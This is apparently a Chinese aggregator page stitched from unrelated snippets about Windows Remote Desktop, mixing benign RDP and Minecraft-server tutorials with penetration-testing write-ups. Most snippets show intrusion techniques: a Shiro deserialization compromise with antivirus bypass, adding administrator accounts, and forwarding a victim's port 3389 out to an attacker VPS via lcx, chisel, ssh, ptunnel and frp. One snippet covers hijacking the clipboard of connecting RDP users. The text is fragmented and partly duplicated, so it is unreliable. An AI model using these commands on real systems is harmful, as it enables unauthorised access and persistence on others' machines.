获取Ubuntu系统的IP地址,用Windows自动的远程连接工具(mstsc.exe)连接
今天给大家分享一下如何使用ipv6进行远程桌面3389端口登录,具体的教程,如下所示。...服务器端设置: 打开命令行 输入如下命令 netsh interface portproxy add v6tov4 listenport=3389 connectport=3389 通过 netstat...-ano | find "3389" 查看端口映射是否正确 正常应显示如下 TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 848TCP [::]:3389 [::]:0 LISTENING...848UDP 0.0.0.0:3389 *:* 848UDP [::]:3389 *:* 848 说明ipv6上端口3389监听成功 基本原理介绍: windows中的远程登录服务默认侦听在ipv4的...3389端口, 我们只需要打开一个ipv6的端口开始侦听,并把数据转发给ipv4的3389端口即可这也就是命令netsh interface portproxy 的意义 ----------------
0x05 绕过异地登录提醒 虽然已经是最高权限了,但由于这台主机为阿里云,且存在360主动防御,就不添加用户进行远程桌面连接了,因为360会拦截添加用户,而且远程桌面连接时会触发异地登录提醒。...get-id') do set CID=%%i echo Connection ID Is: %CID% 接着我们使用静默安装批处理文件中设置的固定连接密码和获取到的连接ID即可连接到目标主机的远程桌面
服务器端设置: 打开命令行 输入如下命令 netsh interface portproxy add v6tov4 listenport=3389 connectport=3389 通过 netstat...-ano | find "3389" 查看端口映射是否正确 正常应显示如下 TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 848TCP [::]:3389 [::]:0 LISTENING...848UDP 0.0.0.0:3389 *:* 848UDP [::]:3389 *:* 848 说明ipv6上端口3389监听成功 基本原理介绍: windows中的远程登录服务默认侦听在ipv4的...3389端口, 我们只需要打开一个ipv6的端口开始侦听,并把数据转发给ipv4的3389端口即可这也就是命令netsh interface portproxy 的意义 ----------------
感谢朋友@Sin的投稿,这篇文章记录的是他如何发现、利用Shiro反序列化漏洞,又是怎样绕过火绒安全防护实现文件落地、添加管理员,最后进入远程桌面,以及在测试过程中遇到的一些坑。...于是考虑直接用feihong的反序列话工具,但是这次feihong的反序列化工具只检测出key,gatget没有检测出来,咨询了同事琛哥后,故考虑到是因为工具很久没更新,需要找一条CB的链,啪的一下回车 直接开冲...的IP,搞得我晚上凌晨还在四处找人要VPS,感觉还是得随时准备一台国内的vps和国外的一台vps。...在找到vps后,先在工具上ping了一下vps的IP地址 可以解析到ip美滋滋,不过在下载之前还是最好看看目标服务器最近的登陆时间,以免被发现 直接开冲,首先在vps上启动一个临时的python web...因为机器中存在火绒,所以还需要bypass火绒添加用户上去,方法我就暂时不放出来了(还请各位师傅见谅哈) 用户加入完成后就可以进行远程桌面连接了,这里为了避免机器告警,我们还需要把3389转发出来。
上文说到了windows 7 自带的远程桌面连接的使用教程,win 系统自带的远程桌面连接方便缺点也很多,当你的 vps 较多的话会很麻烦。...支持平台:Win2003/Win2008/xp/Win7 安装包大小:1.95MB 功能概要:远程桌面一键登录,自动保存密码,批量管理,可管理 Windows 和 Linux,是一款简单好用的 3389...打开软件后屏幕默认设置为 70%,这样我们登陆 vps 之后直接能够看到全部的 vps 桌面了,这时候我们切换本地电脑桌面和 vps 桌面就容易多了,和 windows 自带的远程桌面连接相比真是太方便了...宝塔远程桌面助手还可以对已经储存的 vps 进行编辑、删除,或者添加新的 vps,实在是很方便。 当然还有共享硬盘等更多功能等待你去发掘。 ? 是不是很简单很方便?...今天说的是宝塔远程桌面助手使用教程,其操作和易用性比 windows 自带的远程桌面好用很多了,本教程适用于 VPS 和独立服务器,希望对新手站长有所帮助。
本次以远程桌面连接来进行说明,介绍几种常用的连接方式。...portfwd add -l 5555 -p 3389 -r 172.16.86.153 转发目标主机的3389远程桌面服务端口到本地的8888,使用linux中的rdesktop连接本地的8888端口...0x04.2 lcx.exe 使用条件:服务器通外网,拥有自己的公网ip lcx是一个经典的端口转发工具,直接把3389转发到公网的vps上。...lcx.exe -slave 1.1.1.1 9999 127.0.0.1 3389 因为我公网vps使用的是linux的系统,lcx对应linux的工具为portmap 。...连接远程桌面成功。
基础环境 本地攻击机 10.11.42.99 ☁️VPS 192.168.144.174 ☁️目标Widnwos Web服务器(出网) 192.168.144.210 必要配置 到☁️VPS192.168.144.174...具体流程 先在本地攻击机执行ssh转发,之后用远程桌面连接本地的33389端口,实际是连接192.168.144.210的远程桌面。...简单说 就是通过☁️VPS这台机器把本地攻击机的33389端口转到了☁️目标服务器的3389端口上,也就是说这个ssh 隧道是建立在本地攻击机与☁️VPS之间的。...这台机器,把来自外部的33389端口流量都转到目标服务器(不出网)的 3389 上。...1 | netstat -an |egrep "3389|33389" ? 远程连接☁️VPS的3389端口,成功连接进入目标服务器(不出网)的远程桌面中。 ?
而且像我这等穷人又没钱买死贵死贵的vps搭建云Kali,怎么办?这时候就要借助内网穿透工具了,网上很多工具都能实现,这里推荐Ngrok。...PS:接下就要将对方的端口转发到我们本地了,以3389端口远程桌面为例。...由于是通过Ngrok中转反弹到的shell,所以portfwd命令不能将远程桌面直接在metaspolit框架中实现,这里借助lcx继续进行反弹。...二、转发3389端口到本地 1.在Kali中执行lcx监听和转发命令: ....3.开始在Kali中连接远程桌面连接: rdesktop 127.0.0.1:33891 ? ? ? ? 至此我们已经成功连接上了3389远程桌面。
在攻击者vps上面执行: ssh -CfNg -L 1153(vps端口) : 192.168.52.138(目标机ip) : 3389(目标端口) root@192.168.1.103(跳板机) //...Server 8的远程桌面。...我们的思路是:通过外网vps访问内网windows server 8的3389端口。...)的3389端口上,我们访问vps的3307端口,即可访问内网windows server 8的3389端口远程桌面了: 动态转发实验 前面介绍的端口转发类型都叫静态端口转发,所谓的 “静态” 是指应用程序服务器端的...打开,sockscap64,将你想要进行代理的应用程序添加进去(方法很简单,找到可执行文件后拖进去即可),这里我把远程桌面程序添加了进去 点击上面的“代理”,进去添加一个代理,设置好vps或代理服务器的
一款可以替代Windows默认的远程桌面链接,本软件可以批量批量管理Windows 3389服务器,适合拥有很多Windows服务器和VPS的朋友使用。当然也适用于只有一台远程服务器的朋友。...不用每次都输入密码,可以分组管理,所有服务器和vps一目了然,尽在掌握。稳定高效,提高你的管理效率!...下载地址:https://file.i7it.cn(IDC常用工具>远程桌面管理工具)
img 然后设法远程桌面登录,查看3389是否开启: netstat -ano | find "3389" 发现是开启的 ?...img 执行run post/windows/manage/enable_rdp模块来关闭防火墙,并使用rdesktop打开远程桌面 ? img ? img 成功开启远程桌面。...在我们公网vps上面开启Earthworm监听 ....用nmap扫描win2003的3389端口,发现其没有开启: proxychains4 nmap -p 3389 -Pn -sT 192.168.52.141 # -Pn和-sT必须要有 ?...img 开启远程桌面 ?
众所周知,MC是一个存在时间很久的一个游戏了 至今还有着不少的玩家 更是养活了不少的MC服务器 今天我就来教大家如何开一个MC的高版本可带mod的服务器 首先我们得有我们自己的vps 这里我用的是极创云的...vps机器做的演示 图片 高版本的服务器的配置需求,最少是要4h4g才能运行 不过建议最好还是4h4g往上,因为4h4g运行起来还是很吃力的了 我们首先要做的就是链接vps的桌面 我们可以按住win+r...键 呼出运行窗口 图片 在里面输入mstsc 打开远程桌面链接 图片 我们在里面输入服务商所给的ip地址还有账户密码即可进入后台 接下来就开始我们的服务端配置阶段 我们以1.16.5的mohist【墨核...】核心来做演示 点我去下载墨核 图片 当然了开服前我们需要准备两样东西 一个是我们的服务端核心,还有一个就是我们的开服器 首先我们先右键创建一个txt文档 然后我们在里面输入如下配置 @echo off...后缀修改为.bat 然后运行下载即可 如果显示下载失败,那么有可能就是核心路径不对 或者是你的服务器内存不够 需要调启动器的占用内存 图片 下载完之后再启动,就是现在这个样子了 输入list可以检查是否开服成功
0x02 chisel进行远程桌面代理 首先需要两台windows主机和一台VPS,在这里使用VPS作为chisel服务器端,然后使用win7作为内网主机,使用win10作为我们的攻击者主机。...chisel客户端(win7的IP为192.168.223.151) chisel.exe client -v VPS:6666 R:0.0.0.0:33389:192.168.223.151:3389...(2):第二步:将win7的3389端口转发到VPS的33389端口 其实上一步已经完成了这一步操作,现在看一下chisel服务端和客户端的连接情况。 服务端 ? 客户端 ?...(3):第三步:使用攻击者主机连接win7的3389 ? 成功登录远程桌面。...在VPS上使用ssh进行本地流量转发: ssh -C -f -N -g -L 0.0.0.0:23333:127.0.0.1:1080 root@VPS ?
什么情况下需要端口转发: Web服务器在内网中,远程桌面无法连接,因此需要进行端口转发。...无外网IP 我们有一个外网IP:10.22.124.132 在目标机器上执行lcx.exe -slave 10.22.124.132 6666 127.0.0.1 3389...意思是把目标机器的 3389端口与公网服务器的 6666端口绑定。...我们直接访问本机的9999端口,通过vps的端口转发,相当于访问的是目标主机的3389端口。 此时已经成功登陆进来,我们查看IP,可以看到是目标机器。
没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了。...,help 然后setp c:windowstempcmd.exe 设置终端路径为:c:windowstempcmd.exe 22.当不支持aspx,或是支持但跨不了目录的时候,可以上传一个读iis的vps...administrators jianmei /add 查看制定用户信息:net user jianmei 查看所有管理权限的用户:net localgroup administrators 加入远程桌面用户组....asp 把cmd.exe复制到c:windows的temp目录下并命名为cmd.txt:copy c:windowstempcookiescmd.exe c:windowstempcmd.txt 开3389...其中键值DenyTSConnections 直接控制着3389的开启和关闭,当该键值为0表示3389开启,1则表示关闭。
解决办法1: 远程桌面连接-》选项-》高级-》去掉“主题”和“位图缓存”这两个选项,然后登陆服务器 解決的方法2: 一个用户黑屏后,使用另外一个管理员用户登陆。...解决办法3: 用增强的3389远程桌面登陆器登录试一试,能正常登录就重启服务器或vps。
: ptunnel -x Gamma 内网10.10.10.18 3389端口就被转发到攻击vps的8888端口了 4.3 icmp隧道搭建 安装icmptunnel git clone https:/...上执行以下命令 ssh -CfNg -L :: root@目标外网Web服务器(会要求输入密码) ssh -CfNg -L 8080:10.1.1.3:3389...root@100.100.1.100 #VPS上查看8090端口是否已经连接 netstat -tulnp | grep "8090" #连接目标内网服务器的远程桌面 VPS-IP:8090 远程转发...:3389 root@192.168.0.1 访问VPS的8090端口,即可连接内网数据库服务器的3389 4.7 Frp搭建隧道: github:https://github.com/fatedier...#要转发的端口 remote_port = 7001#远程端口 plugin =socks5 访问vps 7001 则访问内网3389端口 启动的话就一个服务器.
环境准备 靶机(VPS):Windows server2012 192.168.135.133,开启3389 CS 4.5 192.168.22.103 在这里控靶机,顺便反制Windows10机器的...RDP反制 此时这个服务器已经被控,维护人员用Windows来3389连接这个vps,首先看下本地win10远程登录的选项: image.png 在高级选项详细信息这里可以看到,当前的机器中驱动器默认是不选择的...其实在这里通过kill掉复制粘贴的进程,促使对方开启共享(看运气) 此时我们就要借助一个复制粘贴的进程了: image.png 在这里可以尝试使用剪切板劫持攻击,在使用mstsc进行远程桌面的时候,会启动一个叫...在这里除了正常的进程之外,还有一个我们的beacon.exe进程,等对方3389到这台vps之后看下: dir \\tsclient\c image.png 此时对方没有开启c盘共享,看下进程:...、 就算是在3389的桌面上这样运行,也只能够在vps上显示: image.png 因此,在作者的文章中提到了一个思路,将木马捆绑到一个常用的可执行文件上,然后等对方点击的时候,就上线了。
攻击者vps上面执行: ptunnel -p 192.168.1.103 -lp 1080 -da 192.168.52.143 -dp 3389 -x whoami ?...上述命令的含义是:在访问攻击者vps(192.168.1.101)的1080端口时,会把数据库服务器(192.168.52.143)的3389端口的数据封装在ICMP隧道里,以Web服务器192.168.1.103...最后在攻击者vps上面访问其本地1080端口即可与数据库服务器的3389端口建立连接: ?...内网端口转发 在受害机(Windows)上面执行如下命令,将受害机3389端口的数据转发到攻击者公网VPS(Windows)的8000端口上。...此时即可登录用远程桌面登录:4444,即可访问受害者的3389端口远程桌面了。 ? Linux系统上面使用portmap: 先在具有公网ip的攻击机上执行: .
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
实时音视频
即时通信 IM
对象存储
